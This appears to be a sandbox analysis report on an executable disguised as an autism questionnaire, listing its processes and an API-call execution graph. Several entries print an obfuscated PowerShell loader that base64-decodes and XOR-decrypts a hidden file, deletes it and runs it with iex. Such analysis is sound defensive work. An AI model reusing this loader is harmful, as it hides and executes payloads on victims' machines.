                                                                                            Chronological Activities

                                                                                            Analysis Process: conhost.exe PID: 6648 Parent PID: 6580

                                                                                            General

                                                                                            Start time:14:40:34
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7f20f0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Chronological Activities

                                                                                            Analysis Process: powershell.exe PID: 6612 Parent PID: 2880

                                                                                            General

                                                                                            Start time:14:40:34
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
                                                                                            Imagebase:0x11b0000
                                                                                            File size:430592 bytes
                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Reputation:high

                                                                                            Chronological Activities

                                                                                            Analysis Process: powershell.exe PID: 6928 Parent PID: 2880

                                                                                            General

                                                                                            Start time:14:40:34
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
                                                                                            Imagebase:0x11b0000
                                                                                            File size:430592 bytes
                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Reputation:high

                                                                                            Chronological Activities

                                                                                            Analysis Process: conhost.exe PID: 6920 Parent PID: 6612

                                                                                            General

                                                                                            Start time:14:40:34
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7f20f0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            Chronological Activities

                                                                                            Analysis Process: powershell.exe PID: 6372 Parent PID: 2880

                                                                                            General

                                                                                            Start time:14:40:35
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
                                                                                            Imagebase:0x11b0000
                                                                                            File size:430592 bytes
                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET

                                                                                            Chronological Activities

                                                                                            Analysis Process: conhost.exe PID: 6376 Parent PID: 6928

                                                                                            General

                                                                                            Start time:14:40:35
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7f20f0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            Chronological Activities

                                                                                            Analysis Process: RdrCEF.exe PID: 1304 Parent PID: 6300

                                                                                            General

                                                                                            Start time:14:40:35
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                                                            Imagebase:0xc0000
                                                                                            File size:9475120 bytes
                                                                                            MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            Chronological Activities

                                                                                            Analysis Process: conhost.exe PID: 6136 Parent PID: 6372

                                                                                            General

                                                                                            Start time:14:40:35
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7f20f0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            Chronological Activities

                                                                                            Analysis Process: RdrCEF.exe PID: 7608 Parent PID: 6300

                                                                                            General

                                                                                            Start time:14:40:48
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                                                            Imagebase:0xc0000
                                                                                            File size:9475120 bytes
                                                                                            MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            Chronological Activities

                                                                                            Analysis Process: RdrCEF.exe PID: 7820 Parent PID: 7608

                                                                                            General

                                                                                            Start time:14:40:50
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=18138760929948388568 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=18138760929948388568 --renderer-client-id=2 --mojo-platform-channel-handle=1708 --allow-no-sandbox-job /prefetch:1
                                                                                            Imagebase:0xc0000
                                                                                            File size:9475120 bytes
                                                                                            MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            Chronological Activities

                                                                                            Analysis Process: RdrCEF.exe PID: 7840 Parent PID: 7608

                                                                                            General

                                                                                            Start time:14:40:51
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=1964537546466602417 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                            Imagebase:0xc0000
                                                                                            File size:9475120 bytes
                                                                                            MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            Chronological Activities

                                                                                            Analysis Process: RdrCEF.exe PID: 7884 Parent PID: 7608

                                                                                            General

                                                                                            Start time:14:40:51
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=8469343885171470224 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=8469343885171470224 --renderer-client-id=4 --mojo-platform-channel-handle=1800 --allow-no-sandbox-job /prefetch:1
                                                                                            Imagebase:0xc0000
                                                                                            File size:9475120 bytes
                                                                                            MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            Chronological Activities

                                                                                            Analysis Process: RdrCEF.exe PID: 7940 Parent PID: 7608

                                                                                            General

                                                                                            Start time:14:40:52
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=3770922529545536729 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=3770922529545536729 --renderer-client-id=5 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job /prefetch:1
                                                                                            Imagebase:0xc0000
                                                                                            File size:9475120 bytes
                                                                                            MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            Chronological Activities

                                                                                            Analysis Process: RdrCEF.exe PID: 8024 Parent PID: 7608

                                                                                            General

                                                                                            Start time:14:40:52
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=15315623175826486505 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=15315623175826486505 --renderer-client-id=6 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job /prefetch:1
                                                                                            Imagebase:0xc0000
                                                                                            File size:9475120 bytes
                                                                                            MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            Chronological Activities

                                                                                            Disassembly

                                                                                            Code Analysis

                                                                                            Reset < >

                                                                                              Analysis Process: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe PID: 7084 Parent PID: 3640 Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCOMMON

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.9%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:11.6%
                                                                                              Total number of Nodes:859
                                                                                              Total number of Limit Nodes:34

                                                                                              Graph

                                                                                              execution_graph 29885 409ff0 29886 40a01d 29885->29886 29888 409ffe 29885->29888 29888->29886 29890 409fa8 29888->29890 29891 409fd4 29890->29891 29892 409fb8 GetModuleFileNameW 29890->29892 29894 40b234 GetModuleFileNameW 29892->29894 29895 40b282 29894->29895 29904 40b110 29895->29904 29897 40b2ae 29898 40b2c8 29897->29898 29899 40b2c0 LoadLibraryExW 29897->29899 29930 407a80 29898->29930 29899->29898 29905 40b131 29904->29905 29906 407a20 24 API calls 29905->29906 29907 40b14e 29906->29907 29921 40b1b9 29907->29921 29938 407e48 29907->29938 29909 407a80 24 API calls 29911 40b226 29909->29911 29911->29897 29912 40b194 29942 40ae34 29912->29942 29916 40b1bb GetUserDefaultUILanguage 29950 40a7e4 EnterCriticalSection 29916->29950 29917 40b1ac 29919 40af60 26 API calls 29917->29919 29919->29921 29921->29909 29924 40b1fd 29924->29921 29989 40b044 29924->29989 29925 40b1e3 GetSystemDefaultUILanguage 29926 40a7e4 41 API calls 29925->29926 29928 40b1f0 29926->29928 29929 40af60 26 API calls 29928->29929 29929->29924 29932 407a86 29930->29932 29931 407aac 29934 407a20 29931->29934 29932->29931 30097 40540c 24 API calls 29932->30097 29935 407a26 29934->29935 29937 407a41 29934->29937 29935->29937 30098 40540c 24 API calls 29935->30098 29937->29891 29940 407e4c 29938->29940 29939 407e70 29939->29912 30007 4088ac 29939->30007 29940->29939 30011 40540c 24 API calls 29940->30011 29943 40ae56 29942->29943 29947 40ae68 29942->29947 30012 40ab18 29943->30012 29945 40ae60 30036 40ae98 18 API calls 29945->30036 29948 407a20 24 API calls 29947->29948 29949 40ae8a 29948->29949 29949->29916 29949->29917 29951 40a830 LeaveCriticalSection 29950->29951 29952 40a810 29950->29952 29953 407a20 24 API calls 29951->29953 29955 40a821 LeaveCriticalSection 29952->29955 29954 40a841 IsValidLocale 29953->29954 29956 40a850 29954->29956 29957 40a89f EnterCriticalSection 29954->29957 29958 40a8d2 29955->29958 29960 40a864 29956->29960 29961 40a859 29956->29961 29959 40a8b7 29957->29959 29964 407a20 24 API calls 29958->29964 29968 40a8c8 LeaveCriticalSection 29959->29968 30040 40a4cc 27 API calls 29960->30040 30039 40a6c8 30 API calls 29961->30039 29967 40a8e7 29964->29967 29965 40a862 29965->29957 29966 40a86d GetSystemDefaultUILanguage 29966->29957 29970 40a877 29966->29970 29975 40af60 29967->29975 29968->29958 29969 40a888 GetSystemDefaultUILanguage 30053 40a4cc 27 API calls 29969->30053 29970->29969 30041 4086e4 29970->30041 29973 40a895 29974 4086e4 24 API calls 29973->29974 29974->29957 29976 40af7f 29975->29976 29977 407a20 24 API calls 29976->29977 29984 40af9d 29977->29984 29978 40b00b 29979 407a20 24 API calls 29978->29979 29980 40b013 29979->29980 29981 407a20 24 API calls 29980->29981 29983 40b028 29981->29983 29982 4088ac 24 API calls 29982->29984 29985 407a80 24 API calls 29983->29985 29984->29978 29984->29980 29984->29982 30067 40873c 29984->30067 30078 40aef4 29984->30078 29987 40b035 29985->29987 29987->29924 29987->29925 30091 407b04 29989->30091 29992 40b094 29993 40873c 24 API calls 29992->29993 29994 40b0a1 29993->29994 29995 40aef4 26 API calls 29994->29995 29997 40b0a8 29995->29997 29996 40b0e1 29998 407a80 24 API calls 29996->29998 29997->29996 30000 40873c 24 API calls 29997->30000 29999 40b0fb 29998->29999 30001 407a20 24 API calls 29999->30001 30002 40b0cf 30000->30002 30003 40b103 30001->30003 30004 40aef4 26 API calls 30002->30004 30003->29921 30005 40b0d6 30004->30005 30005->29996 30006 407a20 24 API calls 30005->30006 30006->29996 30008 4088b7 30007->30008 30093 407ba8 30008->30093 30011->29939 30013 40ab2f 30012->30013 30014 40ab43 GetModuleFileNameW 30013->30014 30015 40ab58 30013->30015 30014->30015 30016 40ab80 RegOpenKeyExW 30015->30016 30017 40ad27 30015->30017 30018 40ac41 30016->30018 30019 40aba7 RegOpenKeyExW 30016->30019 30021 407a20 24 API calls 30017->30021 30037 40a928 7 API calls 30018->30037 30019->30018 30022 40abc5 RegOpenKeyExW 30019->30022 30024 40ad3c 30021->30024 30022->30018 30025 40abe3 RegOpenKeyExW 30022->30025 30023 40ac5f RegQueryValueExW 30026 40acb0 RegQueryValueExW 30023->30026 30029 40ac7d 30023->30029 30024->29945 30025->30018 30027 40ac01 RegOpenKeyExW 30025->30027 30030 40acae 30026->30030 30031 40accc 30026->30031 30027->30018 30028 40ac1f RegOpenKeyExW 30027->30028 30028->30017 30028->30018 30032 40ac85 RegQueryValueExW 30029->30032 30033 40ad16 RegCloseKey 30030->30033 30038 40540c 24 API calls 30030->30038 30034 40acd4 RegQueryValueExW 30031->30034 30032->30030 30033->29945 30034->30030 30036->29947 30037->30023 30038->30033 30039->29965 30040->29966 30042 408733 30041->30042 30043 4086e8 30041->30043 30042->29969 30044 4086f2 30043->30044 30050 407e00 30043->30050 30044->30042 30045 408728 30044->30045 30046 40870d 30044->30046 30049 408664 24 API calls 30045->30049 30055 408664 30046->30055 30047 407e44 30047->29969 30052 408712 30049->30052 30050->30047 30054 40540c 24 API calls 30050->30054 30052->29969 30053->29973 30054->30047 30056 4086af 30055->30056 30058 408671 30055->30058 30057 407a44 24 API calls 30056->30057 30061 4086ac 30057->30061 30058->30056 30059 408689 30058->30059 30059->30061 30062 407a44 30059->30062 30061->30052 30063 407a65 30062->30063 30064 407a4a 30062->30064 30063->30061 30064->30063 30066 40540c 24 API calls 30064->30066 30066->30063 30068 408740 30067->30068 30072 4087ae 30067->30072 30070 408748 30068->30070 30074 407e00 30068->30074 30069 407e44 30069->29984 30070->30072 30075 408757 30070->30075 30086 407e00 30070->30086 30072->30072 30074->30069 30085 40540c 24 API calls 30074->30085 30075->30072 30076 407e00 24 API calls 30075->30076 30077 4087aa 30076->30077 30077->29984 30079 40af09 30078->30079 30080 40af26 FindFirstFileW 30079->30080 30081 40af36 FindClose 30080->30081 30082 40af3c 30080->30082 30081->30082 30083 407a20 24 API calls 30082->30083 30084 40af51 30083->30084 30084->29984 30085->30069 30088 407e04 30086->30088 30087 407e44 30087->30075 30088->30087 30090 40540c 24 API calls 30088->30090 30090->30087 30092 407b08 GetUserDefaultUILanguage GetLocaleInfoW 30091->30092 30092->29992 30094 407bb8 30093->30094 30095 407a44 24 API calls 30094->30095 30096 407bd2 30095->30096 30096->29912 30097->29932 30098->29937 30099 407880 30102 407750 30099->30102 30103 407766 30102->30103 30104 407777 30102->30104 30127 4076b8 GetStdHandle WriteFile GetStdHandle WriteFile 30103->30127 30105 407780 GetCurrentThreadId 30104->30105 30107 40778d 30104->30107 30105->30107 30108 4077fc 30107->30108 30119 4054b4 30107->30119 30122 4073b0 30108->30122 30109 407770 30109->30104 30112 407801 30115 407827 FreeLibrary 30112->30115 30117 40782d 30112->30117 30113 4077e4 30113->30108 30114 4054b4 21 API calls 30113->30114 30114->30113 30115->30117 30116 407866 30117->30116 30118 40785e ExitProcess 30117->30118 30128 40cc60 30119->30128 30121 4054ba 30121->30113 30123 4073f4 30122->30123 30124 4073bf 30122->30124 30123->30112 30124->30123 30137 403cf6 30124->30137 30145 40426c 30124->30145 30127->30109 30129 40cc95 TlsGetValue 30128->30129 30130 40cc6f 30128->30130 30131 40cc7a 30129->30131 30132 40cc9f 30129->30132 30130->30121 30136 40cc1c 24 API calls 30131->30136 30132->30121 30134 40cc7f TlsGetValue 30135 40cc8e 30134->30135 30135->30121 30136->30134 30138 403cf8 30137->30138 30165 403c48 30138->30165 30141 403d1f VirtualFree 30143 403d30 30141->30143 30142 403d42 VirtualQuery VirtualFree 30142->30143 30144 403d39 30142->30144 30143->30124 30144->30142 30144->30143 30146 404281 30145->30146 30147 404364 30145->30147 30149 404287 30146->30149 30153 4042fe Sleep 30146->30153 30148 403cf8 30147->30148 30147->30149 30151 40445e 30148->30151 30152 403c48 2 API calls 30148->30152 30150 404290 30149->30150 30155 404342 Sleep 30149->30155 30159 404379 30149->30159 30150->30124 30151->30124 30156 403d09 30152->30156 30153->30149 30154 404318 Sleep 30153->30154 30154->30146 30157 404358 Sleep 30155->30157 30155->30159 30158 403d1f VirtualFree 30156->30158 30164 403d39 30156->30164 30157->30149 30160 403d30 30158->30160 30161 40439c 30159->30161 30163 4043f8 VirtualFree 30159->30163 30160->30124 30161->30124 30162 403d42 VirtualQuery VirtualFree 30162->30160 30162->30164 30163->30124 30164->30160 30164->30162 30166 403c90 30165->30166 30167 403c51 30165->30167 30166->30141 30166->30144 30167->30166 30168 403c5c Sleep 30167->30168 30168->30166 30169 403c76 Sleep 30168->30169 30169->30167 30170 4b60e8 30171 4b610d 30170->30171 30216 4af678 30171->30216 30174 4b611b 30221 4afa44 30174->30221 30175 4b6192 30232 4056d0 QueryPerformanceCounter 30175->30232 30178 4b6137 30178->30175 30305 426f08 24 API calls 30178->30305 30179 4b6197 30235 4aefe8 30179->30235 30182 4b612b 30185 4b64ec 30182->30185 30297 4af1b4 30182->30297 30184 4b616e 30193 4b6176 MessageBoxW 30184->30193 30189 4b6505 30185->30189 30194 4b64ff RemoveDirectoryW 30185->30194 30186 407e00 24 API calls 30187 4b61ac 30186->30187 30254 422954 30187->30254 30191 4b6519 30189->30191 30192 4b650e DestroyWindow 30189->30192 30205 4b6542 30191->30205 30308 408d08 40 API calls 30191->30308 30192->30191 30193->30175 30196 4b6183 30193->30196 30194->30189 30306 41f238 78 API calls 30196->30306 30201 4b6538 30309 40540c 24 API calls 30201->30309 30204 4b61da 30206 40873c 24 API calls 30204->30206 30207 4b61e8 30206->30207 30208 407e00 24 API calls 30207->30208 30209 4b61f8 30208->30209 30277 423d00 30209->30277 30211 4b6237 30283 424748 30211->30283 30213 4b6299 30307 424a24 108 API calls 30213->30307 30215 4b62c0 30310 4af244 30216->30310 30222 4afa74 30221->30222 30223 4afa65 30221->30223 30225 407a20 24 API calls 30222->30225 30224 407e48 24 API calls 30223->30224 30226 4afa72 30224->30226 30225->30226 30329 4087c4 30226->30329 30228 4afa9c 30229 4afaab MessageBoxW 30228->30229 30230 407a80 24 API calls 30229->30230 30231 4afacd 30230->30231 30231->30182 30233 4056dd GetTickCount 30232->30233 30234 4056eb 30232->30234 30233->30234 30234->30179 30242 4aeff0 30235->30242 30238 4af02f CreateDirectoryW 30239 4af039 GetLastError 30238->30239 30240 4af0af 30238->30240 30239->30242 30241 407e00 24 API calls 30240->30241 30243 4af0b9 30241->30243 30242->30238 30335 422d70 30242->30335 30360 4aeec8 30242->30360 30380 426f08 24 API calls 30242->30380 30381 419e18 24 API calls 30242->30381 30382 4232ec FormatMessageW 30242->30382 30386 426ed8 24 API calls 30242->30386 30387 41f264 24 API calls 30242->30387 30388 40711c 24 API calls 30242->30388 30245 407a80 24 API calls 30243->30245 30246 4af0d3 30245->30246 30248 407a80 24 API calls 30246->30248 30249 4af0e0 30248->30249 30249->30186 30255 422964 30254->30255 30256 4088ac 24 API calls 30255->30256 30257 422976 30256->30257 30258 4226c8 30257->30258 30259 4226f2 30258->30259 30260 422706 30259->30260 30261 4226f8 30259->30261 30262 4088ac 24 API calls 30260->30262 30263 40873c 24 API calls 30261->30263 30264 422719 30262->30264 30265 422704 30263->30265 30266 40873c 24 API calls 30264->30266 30267 407a20 24 API calls 30265->30267 30266->30265 30268 42273b 30267->30268 30269 422660 30268->30269 30270 42268e 30269->30270 30273 42266a 30269->30273 30271 407e00 24 API calls 30270->30271 30272 422697 30271->30272 30272->30204 30273->30270 30274 42267d 30273->30274 30275 40873c 24 API calls 30274->30275 30276 42268b 30275->30276 30276->30204 30278 423d0a 30277->30278 30463 423da8 30278->30463 30279 423d39 30281 423d4f 30279->30281 30466 423cac 109 API calls 30279->30466 30281->30211 30284 424755 30283->30284 30288 4247ae 30284->30288 30469 41f264 24 API calls 30284->30469 30286 4247a9 30470 40711c 24 API calls 30286->30470 30292 4247d6 